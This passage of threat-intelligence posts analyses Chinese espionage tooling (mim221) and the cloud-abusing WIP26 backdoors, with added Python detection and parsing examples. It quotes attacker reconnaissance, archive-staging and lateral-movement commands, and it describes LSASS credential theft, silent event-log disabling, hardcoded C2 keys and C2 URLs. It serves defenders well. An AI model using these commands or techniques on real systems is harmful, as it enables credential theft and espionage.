    "cmd"  /c cd /d c:\windows\system32\inetsrv\&query user&cd
    "cmd"  /c cd /d C:\MS_DATA\&lg.exe \\[IP ADDRESS] -lu >169.txt&cd

The attackers then check connectivity with both the Internet and specific local machines of interest.

    "cmd"  /c cd /d c:\windows\system32\inetsrv\&ping 8.8.8.8 -n 1&cd
    "cmd"  /c cd /d c:\windows\system32\inetsrv\&ping -n 1 [IP ADDRESS/HOSTNAME]&cd

They also retrieve networking information, such as network adapters, specific machines, and network services like Remote Desktop Protocol (RDP).

    "cmd"  /c cd /d C:\MS_DATA\&ipconfig /all&cd
    "cmd"  /c cd /d c:\windows\system32\inetsrv\&net use&cd
    "cmd"  /c cd /d c:\windows\system32\inetsrv\&netstat.exe -nob
    "cmd"  /c cd /d c:\windows\system32\inetsrv\&netstat -aon |find "3389"&cd
    "cmd"  /c cd /d C:\MS_DATA\&netstat -aon |find "[IP ADDRESS]"&cd

The threat actor made use of the native makecab tool to compress information gathered for exfiltration.

    "cmd"  /c cd /d C:\MS_DATA\&makecab da.back d.zip >1.txt&cd

For lateral movement, the attackers made use of the PsExec tool and the net use command for accessing shared resources on remote machines.

    "cmd"  /c cd /d C:\MS_DATA\&net use \\[IP ADDRESS] [PASSWORD] /u:[DOMAIN]\[USERNAME]
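The command lines above follow one template: cmd /c, a cd /d into the working directory, the tool and its arguments, an optional output redirect, and a trailing &cd that echoes the directory back into the webshell response. As an added example, not part of the original post, the Python below parses that template (quote-aware, because the dsquery LDAP filter contains a literal &) and tags each command with a coarse category, so a dump of webshell-issued commands can be summarised quickly. The category labels are this example's own.

```python
import re
from collections import Counter

# The command lines quoted above (bracketed placeholders kept as in the post).
OBSERVED = [
    r'"cmd"  /c cd /d C:\MS_DATA\&dsquery * -limit 0 -filter "&(objectClass=User)(objectCategory=Person)" -attr objectSID sAMAccountName displayName  mail memberOf >da.back&cd',
    r'"cmd"  /c cd /d c:\windows\system32\inetsrv\&query user&cd',
    r'"cmd"  /c cd /d C:\MS_DATA\&lg.exe \\[IP ADDRESS] -lu >169.txt&cd',
    r'"cmd"  /c cd /d c:\windows\system32\inetsrv\&ping 8.8.8.8 -n 1&cd',
    r'"cmd"  /c cd /d C:\MS_DATA\&ipconfig /all&cd',
    r'"cmd"  /c cd /d c:\windows\system32\inetsrv\&net use&cd',
    r'"cmd"  /c cd /d c:\windows\system32\inetsrv\&netstat.exe -nob',
    r'"cmd"  /c cd /d c:\windows\system32\inetsrv\&netstat -aon |find "3389"&cd',
    r'"cmd"  /c cd /d C:\MS_DATA\&makecab da.back d.zip >1.txt&cd',
    r'"cmd"  /c cd /d C:\MS_DATA\&net use \\[IP ADDRESS] [PASSWORD] /u:[DOMAIN]\[USERNAME]',
]

CMD_PREFIX = re.compile(r'^"?cmd(?:\.exe)?"?\s+/c\s+', re.I)
CHDIR = re.compile(r"^cd\s+/d\s+(\S+)$", re.I)
REDIRECT = re.compile(r"\s*>\s*(\S+)\s*$")
CATEGORY = {
    "dsquery": "discovery:active_directory", "query": "discovery:sessions",
    "lg": "discovery:local_groups", "ping": "discovery:connectivity",
    "ipconfig": "discovery:network_config", "netstat": "discovery:connections",
    "makecab": "collection:archive_for_exfil", "type": "staging:file_assembly",
}


def split_unquoted(text, sep="&"):
    """Split on `sep` outside double quotes (the dsquery LDAP filter contains a literal '&')."""
    parts, buf, quoted = [], [], False
    for ch in text:
        if ch == '"':
            quoted = not quoted
        if ch == sep and not quoted:
            parts.append("".join(buf))
            buf = []
        else:
            buf.append(ch)
    parts.append("".join(buf))
    return [p.strip() for p in parts if p.strip()]


def parse_webshell_cmd(line):
    """Normalise one '"cmd" /c cd /d <dir>&<tool> <args>[ >file]&cd' line."""
    rec = {"workdir": None, "tool": None, "args": "", "output": None, "category": "unknown"}
    for seg in split_unquoted(CMD_PREFIX.sub("", line.strip())):
        m = CHDIR.match(seg)
        if m:
            rec["workdir"] = rec["workdir"] or m.group(1)
            continue
        if seg.lower() == "cd":          # trailing '&cd' only echoes the directory
            continue
        m = REDIRECT.search(seg)
        if m:
            rec["output"] = m.group(1)
            seg = seg[:m.start()]
        tool, _, args = seg.partition(" ")
        tool = tool.lower()
        tool = tool[:-4] if tool.endswith(".exe") else tool
        rec["tool"], rec["args"] = tool, args.strip()
        if tool == "net":
            toks = rec["args"].split()
            # 'net use' alone lists sessions; with a target and credentials it opens one.
            rec["category"] = ("lateral_movement:smb_session"
                               if len(toks) > 1 and toks[0].lower() == "use" else "discovery:net")
        else:
            rec["category"] = CATEGORY.get(tool, "unknown")
    return rec


def summarize(lines):
    """Counts per category, e.g. to see how much of a webshell session is recon vs. staging."""
    return Counter(parse_webshell_cmd(l)["category"] for l in lines)
```

The working directory and the redirect target are worth keeping as separate fields: C:\MS_DATA\ and the files written there (da.back, 169.txt, d.zip) are exactly what a responder needs to collect before the actor cleans up.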

A Penchant for Credential Theft

In order to steal credentials, the attackers employ custom modified versions of Mimikatz, including an executable named pc.exe.

Mimikatz publicly available code (top); strings from a Mimikatz modification (bottom)

The pc.exe executable stages the execution of three other components that ultimately result in stealing credentials from the Local Security Authority Subsystem Service (LSASS) process.

We refer to the four-component chain as 'mim221' based on the version number that the tool displays (2.2.1).

We observed the threat actors deploying individual chunks of pc.exe in the working directory and merging these into pc.exe using the type command.

pc.exe file chunks

We noticed that the attackers ceased their activities after stealing credentials. This could indicate a multi-phase attack strategy in which backdoors and further persistence mechanisms are deployed separately, once credential theft has secured continued access. In the cases we observed, the intrusions were detected and interrupted before any such further phase, such as deploying backdoors, could be carried out.

mim221

The architecture of mim221 consists of four components: the pc.exe Windows executable, and the AddSecurityPackage64.dll, pc.dll, and getHashFlsa64.dll DLLs contained therein.

mim221 execution overview

mim221 component          Size    Compilation timestamp (UTC)
pc.exe                    502 KB  Thu Jun 09 08:02:12 2022
AddSecurityPackage64.dll  119 KB  Thu Jun 09 08:01:46 2022
pc.dll                    297 KB  Tue Jun 07 16:55:05 2022
getHashFlsa64.dll         216 KB  Fri May 27 20:56:26 2022

pc.exe

The main binary executed by the threat actor is pc.exe. It decrypts AddSecurityPackage64.dll and pc.dll, stores pc.dll on the file system, and then loads and executes AddSecurityPackage64.dll by invoking its exported function, pathAddPackage.

The execution of pc.exe requires a password supplied by the operator (in this case, P2sSW0rd1234!@#$C), which the operator provides through the key command-line parameter.

pc.exe decrypts AddSecurityPackage64.dll and pc.dll using the AES encryption algorithm, providing the operator-provided execution password as an initialization vector.

pc.exe loads and executes the decrypted AddSecurityPackage64.dll using reflective image loading: the Windows PE image is first mapped into memory, and then its main entry point or an export function is executed.

Among other activities, the image mapping process includes allocating memory for the image, storing the image headers and sections in the memory, populating the imagesโ€™ import and delay import tables, adding exception handlers, and executing TLS callback and export routines. The Phant0m tool provides a complete implementation of this process.

Reflective image loading is a well-known technique by now; its use was first observed in the DoublePulsar and SlingShot frameworks, in 2017 and 2018 respectively. It allows a malicious image to be loaded and executed entirely in memory without calling the standard Windows loader API, such as LoadLibrary, which sidesteps detections that hook those APIs or look for file artifacts.

When it finishes executing, pc.exe displays a message indicating a version number and build timestamp: Version 2.2.1  - build on Jun  9 2022 16:02:12.

AddSecurityPackage64.dll

AddSecurityPackage64.dll, which is the original filename of this mim221 component, is responsible for:

  • Obtaining the SeDebugPrivilege and SYSTEM privilege by access token impersonation. This allows mim221 to inspect and extract credentials from the LSASS process.
  • Disabling Windows event logging in an attempt to evade detection; and
  • Injecting pc.dll into LSASS as a Security Package. Security Packages are used to extend the Windows authentication mechanism and can be abused to execute malicious code in the context of LSASS.

In an attempt to remain undetected, AddSecurityPackage64.dll disables Windows event logging by killing threads of the Windows Event Log service without stopping the service itself. This is achieved by locating the process that hosts the Event Log service, enumerating that process's threads, identifying the threads that belong to the service by their service tag (eventlog), and terminating them. Because the hosting process keeps running, the service still appears to be up while no events are written.

Querying service tag information

AddSecurityPackage64.dll injects pc.dll into LSASS by deploying pc.dll as a Security Package. To this end, AddSecurityPackage64.dll issues an RPC call to LSASS โ€“ to the ncalrpc:[lsasspirpc] RPC endpoint, providing the file path to pc.dll to LSASS. This call instructs LSASS to load and execute pc.dll, which then stages the getHashFlsa64.dll credential theft component.

getHashFlsa64.dll conducts credential theft in the context of LSASS

pc.dll and getHashFlsa64.dll

In the context of LSASS, pc.dll decrypts, reflectively loads, and executes the credential theft component getHashFlsa64.dll in a manner similar to pc.exe. pc.dll and getHashFlsa64.dll share the same original filename: getHashFlsa64.dll.

pc.dll is implemented such that its main routine returns FALSE, making LSASS execute pc.dll and then unload it. This is a detection evasion technique making LSASS load pc.dll while avoiding appearing as an added (registered) Security Package. LSASS normally creates registry entries when adding Security Packages and does not unload them once loaded. This provides an opportunity for defenders to detect the loading of malicious Security Packages. Previous research provides more detail on this topic.
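Because pc.dll returns FALSE and is unloaded, neither the Security Packages registry value nor a later snapshot of the modules loaded in LSASS will show it. What does survive is the image-load event at the moment LSASS mapped the DLL. As an added example (not code from the post), the Python below checks constructed Sysmon-style image-load events for LSASS against two invariants, a location under System32 and a Microsoft signature, and records whether the module was ever registered as a package. The on-disk location of pc.dll, the registry value contents and the baseline package list are assumptions of the example.

```python
import re

SYSTEM32_DLL = re.compile(r"^c:\\windows\\system32\\[^\\]+\.dll$", re.I)

# Constructed contents of HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages.
REGISTERED_SECURITY_PACKAGES = ["kerberos", "msv1_0", "schannel", "wdigest", "tspkg", "pku2u"]
# Illustrative baseline of package names expected in that value; tune it to the estate.
BASELINE_PACKAGES = {"kerberos", "msv1_0", "schannel", "wdigest", "tspkg", "pku2u", "negoexts", "cloudap"}

# Constructed image-load events in a Sysmon Event ID 7 shape. The path of pc.dll is
# an assumption; the post only says that pc.exe writes it to disk.
IMAGE_LOADS = [
    {"host": "EXCH01", "image": r"C:\Windows\System32\lsass.exe",
     "loaded": r"C:\Windows\System32\kerberos.dll", "signed": True, "signer": "Microsoft Windows"},
    {"host": "EXCH01", "image": r"C:\Windows\System32\lsass.exe",
     "loaded": r"C:\Windows\System32\msv1_0.dll", "signed": True, "signer": "Microsoft Windows"},
    {"host": "EXCH01", "image": r"C:\Windows\System32\lsass.exe",
     "loaded": r"C:\MS_DATA\pc.dll", "signed": False, "signer": ""},
    {"host": "EXCH01", "image": r"C:\Windows\System32\svchost.exe",
     "loaded": r"C:\MS_DATA\pc.dll", "signed": False, "signer": ""},
]


def registry_only_check(registered, baseline=BASELINE_PACKAGES):
    """What a registry-based control sees: packages in the value that are not in the baseline.
    A DLL loaded the way pc.dll is never appears here."""
    return [p for p in registered if p.lower() not in baseline]


def suspicious_lsass_loads(events, registered):
    """Image loads into lsass.exe that break either invariant: under System32, Microsoft-signed."""
    reg = {p.lower() for p in registered}
    findings = []
    for e in events:
        if not e["image"].lower().endswith("\\lsass.exe"):
            continue
        module = e["loaded"]
        name = module.rsplit("\\", 1)[-1].lower()
        package = name[:-4] if name.endswith(".dll") else name
        reasons = []
        if not SYSTEM32_DLL.match(module):
            reasons.append("outside_system32")
        if not e["signed"] or "microsoft" not in e["signer"].lower():
            reasons.append("not_microsoft_signed")
        if reasons:
            findings.append({"host": e["host"], "module": module,
                             "registered": package in reg, "reasons": reasons})
    return findings
```

The registry check comes back empty for this host, which is the point: a defender relying on the Security Packages value alone would see nothing, whereas the load event records pc.dll entering LSASS from the working directory, unsigned and never registered.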

getHashFlsa64.dll accesses the memory of its host LSASS process and stores stolen credentials in a Mimikatz log file named pc.log for later exfiltration.

Example pc.log content

getHashFlsa64.dll exports a function named GetMyVersion, which displays a version number and build timestamp (Version 2.2.0  - build on May 28 2022 04:56:23), in a format consistent with the output of pc.exe. The credential theft functionality of getHashFlsa64.dll is implemented in its export function GetLogonInfo.

The GetMyVersion function

Additional Information

Error Messages and Public Code Reuse

The mim221 components implement error logging. The error messages follow a consistent output format.

Example error messages

It is important to note that we observed code segments that seem to be modified versions of publicly available code. For example, the implementation of AddSecurityPackage64.dll looks like an adaptation of public code that demonstrates injection of a Security Package into LSASS using RPC calls.

Similarity between publicly available code (https://gist.github.com/xpn/c7f6d15bf15750eae3ec349e7ec2380e, top) and AddSecurityPackage64.dll (bottom)

Timestamp Information

The mim221 components that reflectively load other executables, pc.exe and pc.dll, patch a string in the loaded executable before loading it. This string provides further timestamp information: ====A!B@C#0-2022-05-23 16:33:03S. The patching replaces the string with configuration information, such as the mim221 execution password and a path to the log file for storing stolen credentials.

Patched timestamp string

Attribution Analysis

We assess it is highly likely the initial attack phases we observed were conducted by Chinese threat actors with cyberespionage motivations. Telecommunication providers are frequent targets of espionage activity due to the sensitive data they hold. Our analysis identified indicators that point to the Operation Soft Cell actors.

Operation Soft Cell has been associated with the Gallium group based on TTPs and some of the domains the group has been using.

Active since at least 2012, Gallium is likely a Chinese state-sponsored group that targets telecommunication, financial, and government entities in Southeast Asia, Europe, Africa, and the Middle East. While the groupโ€™s original focus has been on telecommunication providers, recent reports suggest that Gallium has expanded its targeting across other sectors.

The initial intrusion vector and the majority of the TTPs we observed closely match those conducted by, or associated with, the Soft Cell actors. This includes deploying webshells at Microsoft Exchange servers for establishing an initial foothold, following the same file naming conventions, using the LG tool and the net, query, and tasklist Windows built-in tools for gathering user and process information, and using the PsExec Windows Sysinternals tool and net for lateral movement and exploration, respectively.

It is worth noting that the attackersโ€™ activities at one of the targets suggested previous knowledge of the environment. We had observed activity at the same target a few months prior, which we attributed to Gallium primarily based on the use of the groupโ€™s PingPull backdoor and TTPs.

By pivoting on the original filename of mim221โ€™s getHashFlsa64.dll, we observed another sample that steals credentials from LSASS. This sample has the PDB path e:\vs_proj\mimkTools\getHashFlsa\getHashFlsa\x64\release\getHashFlsa64.pdb and was first submitted to VirusTotal from Vietnam on January 04, 2023.

The path partially overlaps with the PDB path of a Mimikatz Soft Cell executable (E:\vs_proj\simplify_modify\Win32\simplify.pdb) and another Mimikatz executable of a Chinese threat actor thought to be part of the Soft Cell activity group arsenal (E:\vs_proj\mimkTools\dcsync_new\x64\dcsync64.pdb). This indicates that mim221 and these binaries may originate from the same source.

Closer analysis confirms that the sample we pivoted to is a previous, less-advanced version of mim221 โ€“ Version 2.2.0 โ€“ that does not include some mim221 components, such as AddSecurityPackage64.dll and pc.dll. We refer to this sample as mim220.


Output from mim220 (top) and mim221 (bottom)

Previous research indicates possible connections between the Soft Cell actors and APT41, which is known to conduct Chinese state-sponsored espionage activity as well as financially motivated activity targeting multiple sectors with a broad geographical coverage, including telecommunication providers.

The connection between the Soft Cell actors and APT41 that most relates to the activities that we observed is based on the Whizzimo, LLC certificate of the Soft Cell binary with a PDB path E:\vs_proj\simplify_modify\Win32\simplify.pdb, a binary that possibly originates from the same source as mim221. This certificate has been reported to be used by APT41. Pivoting on this certificate reveals further Mimikatz modifications, some with filenames very similar to those we observed.

Conclusions

Chinese cyberespionage threat actors are known to have a strategic interest in the Middle East. This is evident from their consistent targeted attacks on various entities including government, finance, entertainment, and telecommunication organizations. The recent activities targeting the telecommunication sector this post discusses are some of the latest such attacks.

Our analysis of mim221 highlights the continuous maintenance and further development of the Chinese espionage malware arsenal. These threat actors will almost certainly continue exploring and upgrading their tools with new techniques for evading detection, including integrating and modifying publicly available code.

SentinelLabs continues to monitor espionage activities and hopes that defenders will leverage the findings presented in this post to bolster their defenses.

Indicators of Compromise

SHA1 Note
f54a41145b732d47d4a2b0a1c6e811ddcba48558 pc.exe
1c405ba0dd99d9333173a8b44a98c6d029db8178 AddSecurityPackage64.dll (unpatched)
df4bd177b40dd66f3efb8d6ea39459648ffd5c0e AddSecurityPackage64.dll (patched)
814f980877649bc67107d9e27e36fba677cad4e3 pc.dll
508408edda49359247edc7008762079c5ba725d9 getHashFlsa64.dll (unpatched)
97a7f1a36294e5525310f121e1b98e364a22e64d getHashFlsa64.dll (patched)

WIP26 Espionage | Threat Actors Abuse Cloud Infrastructure in Targeted Telco Attacks

16 February 2023 at 10:55

By Aleksandar Milenkoski, Collin Farr, and Joey Chen, in collaboration with QGroup

Executive Summary

  • A new threat cluster we track as WIP26 has been targeting telecommunication providers in the Middle East.
  • We assess it is likely that WIP26 is espionage-related.
  • WIP26 relies heavily on public Cloud infrastructure in an attempt to evade detection by making malicious traffic look legitimate.
  • WIP26 involves the use of backdoors, dubbed CMD365 and CMDEmber, which abuse Microsoft 365 Mail and Google Firebase services for C2 purposes.
  • WIP26 also involves the use of Microsoft Azure and Dropbox instances as data exfiltration and malware hosting sites.

Overview

In collaboration with QGroup GmbH, SentinelLabs is monitoring a threat activity we track as WIP26. The threat actor behind WIP26 has been targeting telecommunication providers in the Middle East. WIP26 is characterized by the abuse of public Cloud infrastructure โ€“ Microsoft 365 Mail, Microsoft Azure, Google Firebase, and Dropbox โ€“ for malware delivery, data exfiltration, and C2 purposes.

The WIP26 activity is initiated by precision targeting of employees through WhatsApp messages that contain Dropbox links to a malware loader. Tricking employees into downloading and executing the loader ultimately leads to the deployment of backdoors that leverage Microsoft 365 Mail and Google Firebase instances as C2 servers. We refer to these backdoors as CMD365 and CMDEmber, respectively. The main functionality of CMD365 and CMDEmber is to execute attacker-provided system commands using the Windows command interpreter.

The use of public Cloud infrastructure for C2 purposes is an attempt to make malicious C2 network traffic look legitimate and therefore make detection harder for defenders. The CMD365 and CMDEmber samples we observed masquerade as utility software, such as a PDF editor or browser, and as software that conducts update operations. The masquerading attempt involves the use of filenames, application icons, and digital signatures that indicate existing software vendors.

This report provides details on the WIP26 threat activity and further context around the use of CMD365 and CMDEmber.

Intrusion Vector and Activities

The initial intrusion was achieved by sending targeted WhatsApp messages to employees. The messages contained Dropbox links to archive files that supposedly contain only documents on poverty issues in the Middle East. The archives did store such documents, but also a malware loader (PDFelement.exe) masquerading as the PDFelement application.

The PDFelement.exe malware loader has an invalid digital signature that indicates the vendor of the PDFelement application โ€“ Wondershare.

The digital signature of PDFelement.exe

The loader deploys the CMD365 backdoor, a .NET executable named Update.exe, and creates a scheduled task named MicrosoftUpdatesA that executes CMD365 at system startup for persistence.

The MicrosoftUpdatesA scheduled task

The main functionality of CMD365 is to execute commands from a C2 hosted on a Microsoft 365 Mail instance. This capability was used to conduct a variety of activities, such as reconnaissance, privilege escalation, staging of additional malware, and data exfiltration.

Among the malware deployed on compromised machines, we observed another CMD365 sample in addition to the Update.exe โ€“ EdgeUpdater.exe. Further, we observed CMDEmber samples, which use Google Firebase Realtime Database instances as C2 servers โ€“ .NET executables named Update.exe and Launcher.exe.

The exfiltrated data included usersโ€™ private browser data and reconnaissance information on particular high-value hosts in the victimโ€™s network. This is a typical precursor to the subsequent targeting of these hosts. The data exfiltration was orchestrated through the execution of PowerShell commands to transport key data to Microsoft Azure instances. The threat actor behind WIP26 used the Windows Azure website socialmsdnmicrosoft.azurewebsites[.]net as a malware hosting site and akam.azurewebsites[.]net as a data exfiltration site.

In addition to exfiltration, the threat actor utilized the open source tool Chisel masquerading as the Media Player Classic application with an invalid certificate signed as โ€œRare Ideas LLCโ€. This was used to create a TCP tunnel over HTTP from the IP address 193.29.56[.]122, an IP that has previously been associated with Cobalt Strike activity. This was the first and only direct access attempt that was not from Microsoft 365 Mail or Google Firebase instances.

The figure below gives an overview of the Cloud infrastructure the threat actor behind WIP26 used for initial infection and as C2 servers, and exfiltration and malware hosting sites. We informed Google, Microsoft, and Dropbox about the abuse of their infrastructure.

WIP26: Use of Cloud infrastructure

CMD365: Abuse Of Microsoft 365 Mail

CMD365 interacts using the Microsoft Graph API with a Microsoft 365 Mail inbox that has the role of a C2 server. An open-source implementation of Graph API usage for C2 communication is the Azure Outlook C2 tool.

The CMD365 sample Update.exe is a .NET application that masquerades as the legitimate Postman application, signed with an invalid signature.

The digital signature of Update.exe

The core feature of CMD365 is to execute attacker-provided system commands as standard input to an instance of the Windows command interpreter.

CMD365 executes a command

CMD365 issues an HTTP POST request to login.microsoftonline[.]com to authenticate itself to a Microsoft 365 Mail inbox using valid credentials that are hardcoded in the malware. The malware then receives an OAuth Bearer access token that it uses in the further interaction with Microsoft 365.

CMD365 authenticates at Microsoft 365 Mail

CMD365 then creates an inbox folder with a name that is unique for each infected machine. The name is a combination of the physical address of the main active network interface on the machine, the machineโ€™s computer name, and the name of the user in whose context the malware executes. CMD365 collects this information when it starts executing.

CMD365 builds a machine-specific inbox folder name
CMD365 creates an inbox folder

CMD365 polls the inbox folder for C2 commands by querying for emails whose subjects start with the keyword Input. These emails contain C2 input intended for processing by CMD365 on infected machines.

CMD365 polls for C2 commands

The C2 server and CMD365 exchange encrypted and Base64-encoded data. For data encryption and decryption, the malware uses the AES key Xc4u7x!A%D*G-KaPdSr56tp2s5v8y/B? (in string format) and an empty initialization vector (IV).

CMD365 encrypts data

CMDEmber: Abuse Of Google Firebase

CMDEmber interacts with a Google Firebase Realtime Database instance that has the role of a C2 server. The CMDEmber sample Launcher.exe is a .NET application that masquerades as the Opera browser and has an invalid signature that indicates the Opera Norway software vendor. CMDEmber uses the open-source Firebase library by Step Up Labs for communicating with the Google Firebase instances.

The digital signature of Launcher.exe

As with CMD365, the core feature of CMDEmber is to execute system commands using the Windows command interpreter.

When executed, CMDEmber connects to the Firebase instance https://gmall-52fb5-default-rtdb.asia-southeast1.firebasedatabase[.]app/ or https://go0gle-service-default-rtdb.firebaseio[.]com, and then exfiltrates information about the infected machine. The exfiltrated data includes some of the information that CMDEmber collects โ€“ the computer name, the bitness, name, and ID of the CMDEmber process, the name of the user in whose context CMDEmber executes, and the IPv4 and physical addresses of all operational network interfaces on the infected machine.

CMDEmber uses the MD5 hash of the Triple DES key Mgirdhgi256HIKnuefsdf!dfgsdfkjsrht (in string format) to encrypt and decrypt the Base64 data exchanged with the C2.

CMDEmber sends data to and receives data from the C2 server by issuing HTTP POST and GET requests, respectively. The URL paths of these requests contain a unique identifier of each infected machine, which is a combination of the ID and bitness of the CMDEmber process and the physical addresses of the operational network interfaces on the victim machine.

CMDEmber exfiltrates machine information

After exfiltrating information about the infected machine, CMDEmber polls the Firebase instance for C2 commands by issuing HTTP GET requests that include the identifier of the infected machine.

CMDEmber polls for C2 commands

The data that the C2 server and CMDEmber exchange is in JSON format. The Firebase C2 server stores the data exchanged with all infected machines in a single JSON-formatted file whose nodes are the unique identifiers of the machines:

  • The who field indicates the communication direction. The value server marks data sent from the C2 server to an infected machine, whereas the value client marks data sent in the opposite direction.
  • The field data stores the actual data: attacker-provided commands, command outputs, or the information that CMDEmber exfiltrates from infected machines.
Exfiltrated machine information (obfuscated form)
Command sent to an infected machine (deobfuscated form)
Command output from the infected machine (deobfuscated form)
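The who/data layout above, together with the publicly readable database noted in the attribution section, means an analyst who obtains an export of the Firebase file can rebuild each victim's command history. The following added example (not code from the post or from the malware) does that: it walks the nodes, separates server-sent commands from client-sent data, and derives the Triple DES key the way the post describes (MD5 of the hardcoded key string). Only the who/data field semantics and the key string come from the post; the node layout (a list or a dict of Firebase push keys under each machine identifier), the identifier strings, and the record contents are constructed and shown in already-deobfuscated form.

```python
"""Rebuild per-machine C2 sessions from an export of the CMDEmber Firebase
Realtime Database (added analyst example, not the post's or the malware's code).

Known from the post: nodes are machine identifiers; each record carries "who"
("server" or "client") and "data"; the 3DES key is the MD5 of the key string.
Assumed: the list/dict shape under each node, the identifier strings, and the
constructed, already-deobfuscated record contents.
"""
import hashlib
import json
from typing import Dict, List

CMDEMBER_KEY_STRING = "Mgirdhgi256HIKnuefsdf!dfgsdfkjsrht"  # from the post

# Constructed export. Node A uses a plain list; node B uses Firebase-style push
# keys (a dict) to show both shapes an export can take.
SAMPLE_EXPORT = json.dumps({
    "MACHINE-ID-A": [  # constructed identifier
        {"who": "client", "data": "ComputerName=WS01;User=alice;Bitness=64"},
        {"who": "server", "data": "whoami"},
        {"who": "client", "data": "ws01\\alice"},
        {"who": "server", "data": "tasklist"},
    ],
    "MACHINE-ID-B": {  # constructed identifier
        "-N1a": {"who": "client", "data": "ComputerName=WS02;User=bob;Bitness=32"},
        "-N1b": {"who": "unknown", "data": "garbage"},  # malformed record
    },
})


def derive_cmdember_key(key_string: str = CMDEMBER_KEY_STRING) -> bytes:
    """MD5 of the key string, as the post reports CMDEmber does. MD5 yields
    16 bytes, which .NET's TripleDES accepts as a two-key 3DES key."""
    return hashlib.md5(key_string.encode("utf-8")).digest()


def reconstruct_sessions(export_text: str) -> Dict[str, Dict[str, object]]:
    """Group records per machine identifier into commands (server -> client)
    and client messages (client -> server), counting anything unparsable."""
    nodes = json.loads(export_text)
    sessions: Dict[str, Dict[str, object]] = {}
    for machine_id, records in nodes.items():
        if isinstance(records, dict):
            # Firebase push keys sort chronologically, so sorting restores order.
            records = [records[k] for k in sorted(records)]
        commands: List[str] = []
        client_messages: List[str] = []
        unparsed = 0
        for rec in records:
            who, data = rec.get("who"), rec.get("data", "")
            if who == "server":
                commands.append(data)
            elif who == "client":
                client_messages.append(data)
            else:
                unparsed += 1
        sessions[machine_id] = {
            "commands": commands,
            "client_messages": client_messages,
            "unparsed": unparsed,
        }
    return sessions


if __name__ == "__main__":
    for machine_id, session in reconstruct_sessions(SAMPLE_EXPORT).items():
        print(machine_id, json.dumps(session, indent=2))
```

Real exports carry the Base64-encoded, 3DES-encrypted form of each data field; the key returned by derive_cmdember_key is what an analyst would feed to a Triple DES implementation before running the reconstruction, a step left out here to keep the example dependency-free.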

Attribution Analysis

We assess it is likely this activity is espionage-related. We track this activity as WIP26 โ€“ the Work-In-Progress (WIPxx) designation is used for unattributed activity clusters.

The initial intrusion vector we observed involved precision targeting: The threat actor sent WhatsApp messages to targets with download links to backdoor malware. Further, the targeting of telecommunication providers in the Middle East suggests the motive behind this activity is espionage-related. Communication providers are frequent targets of espionage activity due to the sensitive data they hold. Finally, evidence suggests that once they established a foothold, the threat actor targeted usersโ€™ private information and specific networked hosts of high value.

The threat actor behind WIP26 activity appears to have made some OPSEC errors. For example, the JSON file where the Google Firebase C2 server stores data exchanged with machines infected by CMDEmber is publicly accessible at the time of writing, providing further insights into the WIP26 activity.

The use of public Cloud infrastructure by APT groups is not unheard of. These threat actors continue to innovate in order to stay stealthy. This includes leveraging public Cloud infrastructure for C2 purposes to blend in and make the detection of C2 traffic harder for defenders.

For example, the North Korean APT 37 (InkySquid) has used the Microsoft Graph API for C2 operations. Further, similar to CMD365, the SIESTAGRAPH backdoor, used in the REF2924 intrusion set targeting the Foreign Affairs Office of an ASEAN member, leverages the Microsoft Graph API to access Microsoft 365 Mail for C2 communication. Also, the DoNot threat group, which is known for targeting Kashmiri non-profit organizations and Pakistani government officials, has abused Google Firebase Cloud Messaging to stage malware. Finally, threat activity tied to APT28 (Fancy Bear) has leveraged Microsoft OneDrive services for C2 purposes.

Conclusions

The WIP26 activity is a relevant example of threat actors continuously innovating their TTPs in an attempt to stay stealthy and circumvent defenses. The use of public Cloud infrastructure for malware hosting, data exfiltration, and C2 purposes aims at making malicious traffic look legitimate. This gives attackers the opportunity to conduct their activities unnoticed. We hope that this report helps to emphasize this tactic in the continuous effort to identify threat groups engaged in targeting critical industries.

SentinelLabs continues to track the WIP26 threat cluster to provide further insight into its evolution, future activity, and attribution.

Indicators of Compromise

Type Value Note
SHA-1 B8313A185528F7D4F62853A44B64C29621627AE7 The PDFelement.exe malware loader
SHA-1 8B95902B2C444BCDCCB8A481159612777F82BAD1 CMD365 sample (Update.exe)
SHA-1 3E10A3A2BE17DCF8E79E658F7443F6C3C51F8803 CMD365 sample (EdgeUpdater.exe)
SHA-1 A7BD58C86CF6E7436CECE692DA8F78CEB7BA56A0 CMDEmber sample (Launcher.exe)
SHA-1 6B5F7659CE48FF48F6F276DC532CD458BF15164C CMDEmber sample (Update.exe)
Domain https://gmall-52fb5-default-rtdb.asia-southeast1.firebasedatabase[.]app/ Google Firebase instance used for C2 purposes
Domain https://go0gle-service-default-rtdb.firebaseio[.]com/ Google Firebase instance used for C2 purposes
URL https://graph.microsoft[.]com/beta/users/3517e816-6719-4b16-9b40-63cc779da77c/mailFolders Microsoft 365 Mail location used for C2 purposes
URL https://www.dropbox[.]com/s/6a8u8wlpvv73fe4/ Dropbox malware hosting site
URL https://www.dropbox[.]com/s/hbc5yz8z116zbi9/ Dropbox malware hosting site
URL https://socialmsdnmicrosoft.azurewebsites[.]net/AAA/ Microsoft Azure malware hosting site
URL https://socialmsdnmicrosoft.azurewebsites[.]net/ABB/ Microsoft Azure malware hosting site
URL https://socialmsdnmicrosoft.azurewebsites[.]net/AMA/ Microsoft Azure malware hosting site
URL https://socialmsdnmicrosoft.azurewebsites[.]net/AS/ Microsoft Azure malware hosting site
URL https://akam.azurewebsites[.]net/api/File/Upload Microsoft Azure data exfiltration site
IP address 193.29.56[.]122 Chisel C2 server

MalVirt | .NET Virtualization Thrives in Malvertising Attacks

2 February 2023 at 10:55

By Aleksandar Milenkoski and Tom Hegel

Executive Summary

  • SentinelLabs observed a cluster of virtualized .NET malware loaders distributed through malvertising attacks.
  • The loaders, dubbed MalVirt, use obfuscated virtualization for anti-analysis and evasion along with the Windows Process Explorer driver for terminating processes.
  • MalVirt loaders are currently distributing malware of the Formbook family as part of an ongoing campaign.
  • To disguise real C2 traffic and evade network detections, the malware beacons to random decoy C2 servers hosted at different hosting providers, including Azure, Tucows, Choopa, and Namecheap.

Overview

While investigating recent malvertising (malicious advertising) attacks, SentinelLabs spotted a cluster of virtualized malware loaders that has joined the trend. The loaders are implemented in .NET and use virtualization, based on the KoiVM virtualizing protector of .NET applications, in order to obfuscate their implementation and execution. We refer to these loaders as MalVirt (a recently observed and likely related implementation is referred to as KoiVM Loader). Although popular for hacking tools and cracks, the use of KoiVM virtualization is not often seen as an obfuscation method utilized by cybercrime threat actors.

